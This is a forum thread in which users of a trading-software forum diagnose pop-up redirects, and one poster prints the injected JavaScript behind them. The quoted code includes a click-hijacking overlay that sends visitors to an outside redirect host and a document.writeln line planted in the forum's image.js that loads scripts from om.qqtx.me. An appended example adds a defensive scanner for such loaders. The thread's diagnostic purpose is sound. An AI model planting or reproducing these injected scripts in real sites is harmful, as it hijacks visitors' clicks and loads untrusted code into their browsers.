Page 1 of 3 1 2 3
Ads?!?!?!?!?!?!? #474494
10/19/18 23:45
Joined: Jun 2013
Posts: 1,609
DdlV Offline OP
Serious User
Hi jcl.

Yesterday and today I've had ad pop-ups happen on the Forum. Is this a new "feature"?

Thanks.

Re: Ads?!?!?!?!?!?!? [Re: DdlV] #474495
10/19/18 23:57
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
So it’s not just me. There’s an odd redirect that pops up once every few hours. This looks like a hack exploit of some sort to me.

Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474503
10/20/18 10:50
Joined: Feb 2018
Posts: 27
dmac Offline
Newbie
I've gotten it as well. Seems as if the site may be infected with something.

Re: Ads?!?!?!?!?!?!? [Re: dmac] #474505
10/20/18 15:13
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
The bug is repeatable.

First, you must clear your cookies. This is how:
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again

So now that cookies are cleared, the behavior will be immediately repeatable:

7) Go to the Zorro forums.
8) Browse to any thread.
9) Hover your mouse anywhere in the screen.

No matter what, it looks like it wants to redirect you somewhere. See my screenshot #1.


So instead of clicking with my left mouse button, I right-click: Inspect. I get screenshot #2.


If I click on the sources tab, I get screenshot #3.


Notice the mysterious JavaScripts from om.qqtx.me. I saved them below, both in their original form and a readable format.

That second JavaScript has content **BEFORE** I click on the screen. But if I refresh the screen, the second script is **BLANK**. The disappearing script looks like it creates the bad link:
Code:
(function() {
    var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0=")),
        b = document.body || document.getElementsByTagName("body")[0];
    if ("undefined" != b && null != b) {
        var a = document.createElement("div");
        a.id = "div" + Math.floor(999999 * Math.random() + 1E5);
        a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
        a.innerHTML = 	'<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' + 
			x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) + 
			'" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';
        a.onclick = function() {
            this.style.display =
                "none"
        };
        b.insertBefore(a, b.lastChild)
    }
})();



I don't know much about HTML/CSS/JS, but this looks like it might be a sleeper script.

Attached Files: forum_bug1.png, forum_bug2.png, forum_bug3.png
javascripts.zip (66 downloads)
Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474507
10/20/18 17:15
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
As a browser-side workaround, I can block these scripts in Chrome using the ScriptSafe add-in.

Settings:
1) Allow opserver.de to run scripts (allow, not trust).
2) Distrust om.qqtx.me
3) ScriptSafe options -> General Settings -> Default Mode -> Allow

No more pop-ups. (Also, step #3 is to stop blocking all other website scripts, such as Amazon. This Chrome extension wants to block all javascripts by default, which makes no sense.)




Attached Files forum_bug4.PNG
Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474510
10/20/18 18:20
Joined: Jun 2013
Posts: 1,609
DdlV Offline OP
Serious User
Thanks AndrewAMD. So far these pop-ups just seem to be annoying, so I think I'll wait for jcl's comments & hopefully fix.

I'd rather not have a workaround lower the priority of this in case there's also something worse compromised that hasn't been noticed yet...

Thanks.

Re: Ads?!?!?!?!?!?!? [Re: DdlV] #474515
10/20/18 20:34
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
My intent was to document my findings so that this website can be scrubbed clean sooner than later.

Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474543
10/22/18 13:58
Joined: Jul 2000
Posts: 27,977
Frankfurt
jcl Offline
Chief Engineer
I've just checked the forum software, but cannot see an exploit or a source of mysterious popups. I also don't get them here, at least not with Chrome. Are they still there?

Re: Ads?!?!?!?!?!?!? [Re: jcl] #474545
10/22/18 14:25
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
Yes.

jcl, try this in Google Chrome:

1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again
7) Go to Zorro User Forum
8) Click on this thread ("Ads?!?!?!?!?!?!?")
9) Click anywhere in the web page... This should induce the pop-up.
10) Right-click anywhere on the web page and click "Inspect"
11) Click on the "Sources" tab
12) Now take a look at the tree - there should be two offensive javascripts loaded:

top -> om.qqtx.me -> jquery.jscroll.min.js
top -> om.qqtx.me -> jquery.jscroll.min.js?timestamp=[etc.]

I have identified these two scripts as the culprit. If I explicitly block these scripts, I get no pop-ups.

The site has repeated this behavior just now.

Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474547
10/22/18 15:42
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
I found something else interesting.

1) Right-click this page
2) Click "Inspect"
3) Click "Sources"
4) Browse the tree: top -> www.opserver.de -> ubb7 -> ubb_js -> image.js?v=7.5.1p1

Look at the script:

Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}



This line does not look very nice. Was this line injected?
Code:
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");


Based on my experimentation, it appears this line loads the two suspicious scripts in the first place.

Hypothesis: The UBB.threads server is infected.
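
Added example (not part of the thread, and not code from any poster or from UBB.threads): a server-side check an administrator could run over the forum's served .js files to find `document.write`/`document.writeln` calls that load a script from a host outside an allowlist, as the line in image.js above does. The allowlist, the page origin and the sample text (an abridged copy of the quoted image.js) are assumptions made for the example.

```javascript
// Hosts this site is expected to load scripts from (assumed for the example).
const TRUSTED_HOSTS = new Set(["www.opserver.de"]);

// Constructed sample: abridged image.js as quoted in the thread.
const SAMPLE_IMAGE_JS = String.raw`var image_pending = 0;
function newCaptcha(type) {
	if (image_pending) return;
	image_pending = 1;
}
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
function updateCaptcha(responseXML) {
	image_pending = 0;
}`;

// document.write( or document.writeln( ; capture the rest of that line.
const WRITE_CALL = /document\s*\.\s*write(?:ln)?\s*\(([^\n]*)/g;
// In the written markup: <script ... src=URL, tolerating an escaped quote (\' or \").
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*\\?["']?([^\s"'\\>]+)/gi;

// Returns [{ line, host, src }] for every written <script> whose host is not trusted.
function findInjectedLoaders(source, pageOrigin, trustedHosts = TRUSTED_HOSTS) {
  const findings = [];
  for (const call of source.matchAll(WRITE_CALL)) {
    // 1-based line number of the document.write call.
    const line = source.slice(0, call.index).split("\n").length;
    for (const tag of call[1].matchAll(SCRIPT_SRC)) {
      let host;
      try {
        // Resolves relative and protocol-relative (//host/path) URLs
        // against the page origin, the way the browser would.
        host = new URL(tag[1], pageOrigin).hostname;
      } catch {
        host = "(unparseable)"; // report it rather than silently skipping
      }
      if (!trustedHosts.has(host)) findings.push({ line, host, src: tag[1] });
    }
  }
  return findings;
}

// The page origin is an assumption; use the origin the forum is served from.
console.log(findInjectedLoaders(SAMPLE_IMAGE_JS, "https://www.opserver.de/"));
```

This only catches loaders written as a literal `<script src=...>` string; a loader assembled by string concatenation or decoding will not match, so comparing the served files against a pristine copy of the forum software remains the stronger check.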


Moderated by  Petra 


oP group Germany GmbH | Birkenstr. 25-27 | 63549 Ronneburg / Germany | info (at) opgroup.de

Powered by UBB.threads™ PHP Forum Software 7.7.1